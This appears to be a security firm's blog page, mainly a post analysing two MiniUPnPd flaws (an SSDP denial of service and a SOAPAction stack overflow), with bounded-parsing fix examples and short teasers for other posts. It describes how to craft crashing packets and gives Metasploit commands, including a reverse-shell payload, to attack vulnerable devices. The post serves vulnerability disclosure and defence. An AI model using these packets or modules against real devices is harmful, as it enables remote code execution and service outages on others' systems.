
Using Fiddler

Fiddler is a proxy that can intercept all the HTTP(S) traffic that’s flowing between your client and the server you’re connected to. (more…)

MiniUPnPd Analysis and Exploitation

UPnP Summary

Universal Plug and Play (UPnP) is a network protocol that allows seamless discovery of network devices so that they can communicate with each other. UPnP daemons are enabled by default on various devices like routers, printers, smart TVs etc. The UPnP daemon listens on UDP port 1900 and can expose a SOAP interface to the client. The problem is that there are various vulnerabilities present in UPnP daemon executables, as well as in the libraries they use, which an attacker can use to exploit the target.

We have based our research upon the work of the Rapid7 team, which has already provided its contribution to the community with the PDF document accessible on the Internet [1]. We specifically analyzed the MiniUPnPd daemon program and provided PoC Metasploit modules that exploit vulnerabilities present in older versions of MiniUPnPd. The Rapid7 team also addressed the issue of devices exposing SOAP services on the WAN interface. Because of that we wrote a tool called SatUPnP [2]. Our motivation was to write a tool similar to Miranda [3], but with the ability to test UPnP-enabled devices not only on the LAN, but also those accessible over the WAN. The tool does what it promises but should probably be improved with the help of the community. You can use and redistribute the tool and use it in your penetration tests.

UPnP Usage and Statistics

Since we are focused only on the MiniUPnPd implementation of the UPnP protocol, we were interested in the version distribution of MiniUPnPd server programs across the Internet. The MiniUPnPd server currently has nine versions, from 1.0 to 1.8. We used the Shodan search engine to get the percentage of each version used today. The results are shown in the graph below.

[Graph: distribution of MiniUPnPd versions 1.0 to 1.8, according to Shodan]

Update: we received a tip from HD Moore that MiniUPnPd 1.1 reports itself as 1.0, which is also the reason for the high percentage in the picture above.

Please note that versions 1.7 and 1.8 are not shown, because their percentages are too small (or even zero) to be presented on the graph. We can see that the majority of the devices use MiniUPnPd version 1.0/1.1 (71.5%). This is exactly why we focused on that version of the MiniUPnPd implementation. Let's first look at how MiniUPnPd version 1.0 is distributed across different operating systems. The Shodan search engine was again used to determine the percentages presented in the picture below.

[Graph: operating systems running MiniUPnPd 1.0, according to Shodan]

We can see that the largest share belongs to Linux 2.4.22, which Shodan identifies as "Linux/2.4.22-1.2115.nptl". The Debian Linux distribution follows in second place, but other distributions are also present, like MIPS Linux/2.4, Fedora and OpenWRT. The Shodan search engine can also differentiate between versions of Debian, Fedora and OpenWRT that run MiniUPnPd daemon version 1.0. The pictures below present the percentage distribution of the different OpenWRT, Debian and Fedora versions.

[Graphs: version distribution of OpenWRT, Debian and Fedora systems running MiniUPnPd 1.0]

MiniUPnPd Vulnerabilities

MiniUPnPd is one of the vulnerable daemon implementations; it provides a complete UPnP solution as well as iptables firewall management and a SOAP HTTP service. We already saw that there are multiple versions of the MiniUPnPd implementation, the oldest of them being 1.0, which is the one most devices use today.

MiniUPnPd: Denial of Service Vulnerability

A denial of service vulnerability exists in MiniUPnPd versions prior to 1.4 which can be used to crash the process, thus making the UPnP service inaccessible. The Rapid7 document accessible at [1] specifies that the vulnerability is present in the minissdp.c file in the ProcessSSDPRequest() function.

The picture below [1] clearly presents the CVE-2013-0229 vulnerability, which an attacker can use to cause a denial of service. The ProcessSSDPRequest() function takes a socket s as an input parameter and reads at most 1500 bytes from it in a recvfrom() call. The received data must start with "M-SEARCH" for the vulnerable code to be reached. The first yellow block presents the code that scans the received data for '\r' or '\n' characters, which means the code is effectively reading and processing the input line by line. The second yellow code block is reached when the if condition evaluates to true, which happens when the beginning of a line equals the string "st:"; a case-insensitive comparison is used, so the case of the string is ignored. The first while loop in the second yellow code block skips any space or tab characters that follow the "st:" string. Once some other character is detected, it enters the second while loop, which scans the rest of the input data looking for '\r' or '\n' characters and finishes as soon as either of them is found.

[Figure: ProcessSSDPRequest() source in minissdp.c with the two code blocks highlighted, from [1]]

The picture below presents a normal packet that can be sent to the MiniUPnPd 1.0 daemon. We can see that the packet starts with the string "M-SEARCH", as it must for the vulnerable code to be reached. The first yellow while block then searches for the CRLF characters shown in blue, to process each line separately. The packet also specifies the Host HTTP header, which carries the multicast address, and the ST HTTP header, whose value is used to trigger the vulnerability.

[Figure: a normal M-SEARCH packet sent to MiniUPnPd 1.0, with the CRLF characters in blue and the ST value in purple]

The next picture [1] presents the analysis of the code that leads to the vulnerability in question. As the Rapid7 team already identified, the DoS condition can occur in the first yellow code block if the initial packet contains neither '\r' nor '\n' characters. The while loop will read from memory until such a character is found, which can lead to a crash, because the code may attempt to read a memory address that the process is not allowed to access. But there is a greater chance that the second yellow block will trigger the vulnerability, which is why we focus on that.

[Figure: annotated ProcessSSDPRequest() code path leading to the DoS condition, from [1]]

Let's examine what happens if we specifically craft the purple part of the packet above. Since we control only the first 1500 bytes of the input data (as a whole), we need to fill the purple data block with either spaces or tabs, so that the first while loop continues past the end of the input packet. If you look carefully at the picture above, you can see that we did not include the line-ending characters, because that would defeat the purpose and the vulnerability would not be triggered. The second while loop then searches for either the character ' ' or '\t' in the memory after the purple input data, which is not what the code intended to achieve. If the program does not find the ' ' or '\t' characters in the subsequent memory, it can cause the process to crash, because it will try to read from a memory address that does not belong to the process itself. The important thing to remember is that we maximize our chances of success by sending a 1500-byte packet to the target, where the purple block is filled with spaces or tabs.
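To show what the missing check looks like from the defender's side, here is an added example (not MiniUPnPd's own code) of the "st:" header scan described above, rewritten so that every loop is bounded by the number of bytes actually received; the packet contents are constructed for the example.

```c
/* Added example (not MiniUPnPd's code): the "st:" header scan of
 * ProcessSSDPRequest() with the check against the received length n that
 * the pre-1.4 loops in minissdp.c lack, so an unterminated ST value cannot
 * make the scan read past the 1500-byte receive buffer. */
#include <string.h>
#include <strings.h>
#define SSDP_BUFSZ 1500
/* Returns the ST value length and sets *st to its start, or -1 when there is
 * no M-SEARCH, no ST header, or no CR/LF terminating the value within n. */
int find_st_header(const char *bufr, size_t n, const char **st)
{
    size_t i = 0, st_len = 0;
    if (n < 8 || memcmp(bufr, "M-SEARCH", 8) != 0)
        return -1;
    while (i < n) {
        /* to the end of the current line, then past the CR/LF run */
        while (i < n && bufr[i] != '\r' && bufr[i] != '\n')
            i++;
        while (i < n && (bufr[i] == '\r' || bufr[i] == '\n'))
            i++;
        if (i + 3 > n || strncasecmp(bufr + i, "st:", 3) != 0)
            continue;
        i += 3;
        /* first loop of the text: skip spaces and tabs after "st:" */
        while (i < n && (bufr[i] == ' ' || bufr[i] == '\t'))
            i++;
        /* second loop: measure the value up to the line ending */
        while (i + st_len < n && bufr[i + st_len] != '\r' && bufr[i + st_len] != '\n')
            st_len++;
        if (i + st_len == n)
            return -1;  /* value runs off the end of the data: reject it */
        *st = bufr + i;
        return (int)st_len;
    }
    return -1;
}
/* Constructed inputs: a well-formed M-SEARCH, and the crafted packet the text
 * describes ("ST:" padded with spaces to 1500 bytes, no line ending). */
int normal_st_len(void)
{
    static const char pkt[] = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
                              "ST: upnp:rootdevice\r\nMAN: \"ssdp:discover\"\r\nMX: 2\r\n\r\n";
    const char *st;
    return find_st_header(pkt, sizeof pkt - 1, &st);  /* 15 */
}
int crafted_st_rejected(void)
{
    static const char head[] = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:";
    char pkt[SSDP_BUFSZ];
    const char *st;
    memcpy(pkt, head, sizeof head - 1);
    memset(pkt + (sizeof head - 1), ' ', sizeof pkt - (sizeof head - 1));
    return find_st_header(pkt, sizeof pkt, &st) == -1;  /* 1 */
}
```

The original loops stop only on a line ending, so the padded packet makes them keep reading beyond the buffer; the bounded version returns -1 instead and the daemon can simply drop the request.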

MiniUPnPd: Stack Overflow Vulnerability

A stack overflow vulnerability exists in MiniUPnPd version 1.0 which can be used to execute arbitrary code on a vulnerable machine. The Rapid7 document [1] specifies that the vulnerability is present in the upnphttp.c file in the ExecuteSoapAction() function, as seen below.

[Figure: ExecuteSoapAction() source in upnphttp.c, from [1]]

Let's take a look at an example packet that can be sent to the MiniUPnPd daemon. The picture below presents such a packet, where the POST HTTP method is used to send data to the SOAP service. The Host HTTP header shows that the packet is unicast, so it is sent to only one recipient, on port 5555, which accepts SOAP messages. At the end of the packet is the SOAP body, which requests an action from the server. The purple part of the packet is the one used to trigger the stack overflow vulnerability.

For the vulnerable function to be reached we need to specify the SOAPAction HTTP header, which is colored green in the picture above. The purple field is its value and supplies the action pointer parameter that gets passed to the ExecuteSoapAction() function. In the first yellow code block the purple field is scanned for the '#' and '"' characters. The while loop looks for a valid method name, and if it finds one it returns, so the second yellow code block is never reached. This is why we must ensure that the while loop does not find a valid method name. After the while loop, the memset function initializes the method array to zeros and memcpy copies methodlen bytes, starting after the '#' character in action, into the method array. The methodlen is the number of bytes from the '#' character to the '"' character. All this can easily be seen in the picture below [1].

[Figure: the stack layout of ExecuteSoapAction() around the 2048-byte method array, from [1]]

The stack overflow vulnerability is triggered if we supply more than 2048 characters after the '#' character and before the '"' character in the SOAP action. This copies that many bytes into the method array, which can hold only 2048 bytes. If we craft the data carefully we can execute arbitrary code on the target device.
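As an added example (not MiniUPnPd's own code), this is the method-name extraction just described with the length check that version 1.0 lacks: the name between '#' and '"' is copied only if it fits the 2048-byte array, so an overlong SOAPAction value is rejected instead of overwriting the stack. The SOAPAction values are constructed for the example.

```c
/* Added example (not MiniUPnPd's code): the method-name extraction of
 * ExecuteSoapAction() on a SOAPAction header value, with the bound that the
 * 1.0 code in upnphttp.c lacks before it memcpy()s methodlen bytes (from '#'
 * to the closing '"') into a fixed 2048-byte method array. */
#include <stddef.h>
#include <string.h>
#define METHOD_MAX 2048

/* Copies the name between '#' and '"' into method (NUL terminated).
 * Returns its length, or -1 when a delimiter is missing or the name would
 * not fit in METHOD_MAX bytes. */
int extract_soap_method(const char *action, size_t action_len, char method[METHOD_MAX])
{
    const char *hash = memchr(action, '#', action_len);
    if (hash == NULL)
        return -1;
    const char *start = hash + 1;
    const char *quote = memchr(start, '"', action_len - (size_t)(start - action));
    if (quote == NULL)
        return -1;
    size_t methodlen = (size_t)(quote - start);
    if (methodlen >= METHOD_MAX)   /* the missing check; keep room for the NUL */
        return -1;
    memset(method, 0, METHOD_MAX);
    memcpy(method, start, methodlen);
    return (int)methodlen;
}

/* Constructed SOAPAction values: a benign WANIPConnection call, and the
 * overlong name (3000 bytes between '#' and '"') the text describes. */
int benign_method_ok(void)
{
    static const char action[] =
        "\"urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress\"";
    char method[METHOD_MAX];
    return extract_soap_method(action, sizeof action - 1, method) == 20
        && strcmp(method, "GetExternalIPAddress") == 0;  /* 1 */
}

int overlong_method_rejected(void)
{
    static const char pre[] = "\"urn:x#";
    char action[sizeof pre - 1 + 3000 + 1];
    char method[METHOD_MAX];
    memcpy(action, pre, sizeof pre - 1);
    memset(action + sizeof pre - 1, 'A', 3000);
    action[sizeof action - 1] = '"';
    return extract_soap_method(action, sizeof action, method) == -1;  /* 1 */
}
```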

Results

We have written two Metasploit modules for the described vulnerabilities. They are already available in the Metasploit repository. To check them out, run the msfupdate command, which updates Metasploit to the latest version. To use the modules, enter the commands presented below.

To cause denial of service on a vulnerable MiniUPnPd server run the following commands:

msf > use auxiliary/dos/upnp/miniupnpd_dos
msf auxiliary(miniupnpd_dos) > set RHOST [TARGET IP]
msf auxiliary(miniupnpd_dos) > set RPORT [TARGET PORT]
msf auxiliary(miniupnpd_dos) > exploit

To gain code execution on a vulnerable MiniUPnPd server run the following commands:

msf > use exploit/linux/upnp/miniupnpd_soap_bof
msf exploit(miniupnpd_soap_bof) > show payloads
msf exploit(miniupnpd_soap_bof) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(miniupnpd_soap_bof) > set LHOST [MY IP ADDRESS]
msf exploit(miniupnpd_soap_bof) > set RHOST [TARGET IP]
msf exploit(miniupnpd_soap_bof) > exploit

That should be it. Experiment with the modules and try them on your own MiniUPnPd server. Keep in mind that, for security reasons, we only disclosed Metasploit modules that work on the Debian Linux operating system.

Conclusion

In this document we have seen that exploiting known vulnerabilities in software products is relatively easy. We managed to write two working Metasploit modules in a relatively short period of time with no prior knowledge of either the UPnP protocol or the MiniUPnPd daemon implementation. Since a large number of vulnerable MiniUPnPd daemons are currently accessible on the Internet, an attacker can easily write an exploit to gain code execution on those devices, or at least DoS them, which makes UPnP unavailable and causes various annoyances.

The purpose of this document was not to provide attackers with exploits that can be leveraged in the wild, which is why we provided only a PoC for the stack overflow vulnerability on Debian 6 systems, which are relatively rare. The DoS module, however, should work on all devices that run a MiniUPnPd daemon version lower than 1.4.

References:

[1] Rapid7 Team, Security Flaws in Universal Plug and Play, https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf
[2] https://github.com/viris/upnp-scripts
[3] https://code.google.com/p/miranda-upnp/

Teensy and Slovenian Keyboard Layout

Recently we had a project in which we had to simulate social engineering attacks. One of the attacks was visiting a company as an IT administrator, gaining access to the premises and inserting a Teensy USB HID into a desktop computer running Windows 7 or Windows 8.

(more…)

Malware Surveillance in Slovenia: Science-Fiction or Reality

In the last couple of years malware has become widespread, not only around the world but also in Slovenia. This is not something that passes our country by; it is a reality. Let's take a look at the first picture [1], which presents the countries targeted by the NetTraveler malware. We can see that most of the world is affected and Slovenia is also present on the map.

(more…)

Results of Digital Challenge HEK 2013

This year we participated at the HEK 2013 conference. We prepared interesting tasks from the fields of computer science, information science, cryptography and steganography, programming, and also mathematics. This time there were 39 competitors, so it was difficult to win the competition because of the fierce opponents. There were a total of 29 tasks worth 6150 points in total. The best competitor reached 4450 points and solved 24 tasks. There was also a social engineering task, where the competitors had to obtain certain information from the beautiful Doroteja, which was required to obtain the password for one of the tasks. The competition opened one day before the conference, but was mainly held during the conference, on the 11th and 12th of April. The top three also received practical rewards.

I would like to congratulate all of the competitors for solving any digital challenge.

The scores of the top ten users are presented in the table below:

Place  Player         Solved tasks  Points
1      snake          24            4450
2      kernc          20            3900
3      grego87        20            3700
4      deny5          19            3150
5      administrator  18            2850
6      plesauc        16            2650
7      mojca          16            2650
8      marjetica      14            2200
9      tomaz          14            2200
10     matox          15            2200

Wi-Fi Protected Setup (WPS)

The WPS standard was developed in 2007 by the Wi-Fi Alliance (a trade association that promotes wireless LAN technology and certifies products if they conform to certain standards of interoperability) to allow home users who know little of wireless security to set up WPA2 as well as making it easy to add new devices to an existing network. In December 2011 researcher Stefan Viehböck reported a design and implementation flaw to the US-CERT. The flaw makes brute-force attacks against PIN-based WPS feasible to perform on WPS-enabled Wi-Fi networks. The vulnerability note is available on the US-CERT’s web site.

(more…)

Stratfor.si

At the end of December 2011 the group Anonymous attacked the Stratfor (Strategic Forecasting Inc.) web page. The result was around 200 GB of important data. Among other data there was customer information and also credit card numbers. This data breach also disclosed some Slovenian users.

Seen from Slovenia this would not be anything special, but if we take a closer look and follow some of the data posted on Pastebin, it becomes a little more interesting. If we look at the list of Slovenian customers, we see that it is quite interesting: we find people from the government, the Ministry of Defense, media houses, private companies, unknown private companies and even the Catholic Church.
(more…)

Results of Digital Challenge Infosek 2011

This year we also participated, for the first time, at the Infosek 2011 conference. We prepared interesting tasks from the fields of computer science, information science, cryptography and steganography, programming, and also mathematics. This time there were relatively few competitors, only 11, which does not mean that the competition was not a success. There were a total of 32 tasks worth 5100 points in total. The best competitor reached 3500 points and solved 24 tasks. There were also social engineering tasks, where the competitors had to obtain certain information from the beautiful Nives to solve certain tasks. There was also a social engineering task where the competitors had to social-engineer the director of the Viris company, Milan Gabor. The competition was held during the conference, on the 24th and 25th of November, and was prolonged over the weekend until the 27th of November. The top three also received practical rewards.

I would like to congratulate all of the competitors for solving any digital challenge.

The final results of the competition are:

Place  Player   Solved tasks  Points
1      punky    24            3500
2      Netis    24            3100
3      kernc    18            2800
4      razi     11            1100
5      arto     6             900
6      citrus   7             700
7      beta     6             600
8      cubeman  5             500
9      test1    5             500
10     m1       2             200
11     janbk    2             200

Ethical hacking

In the last decade the Internet has spread like no one anticipated. A lot of information has moved to the Internet. Almost everything is being digitized: information is stored in various databases, services are performed over the Internet, we even pay bills from our computers, etc. But in all this craze, we can ask ourselves one question: what about security?

(more…)

Winning at the event of looking for business solutions

The company Frodx organized an event called Arena of Business Solutions in Kolosej on 25th October. Entrepreneurs competed with business ideas, services and solutions.

Viris competed in the category of Public Administration and Large Organizations, among organizations like Avtenta, Inovo, Sonce.net, SmartIS and Medic Sistemi.

With the business idea »Want to hire a hacker?« we won a large share of the votes in the first round of voting, which assessed the presentation and the usefulness of the business idea.

Then the public voted for three finalists, and we came among the top three business ideas. The competitors then had to answer questions from the public and other specialists once again.

After the final presentations and answers, the public chose the winner of the event, and we are proud to say that our CEO, Milan Gabor, won the competition with the best business idea.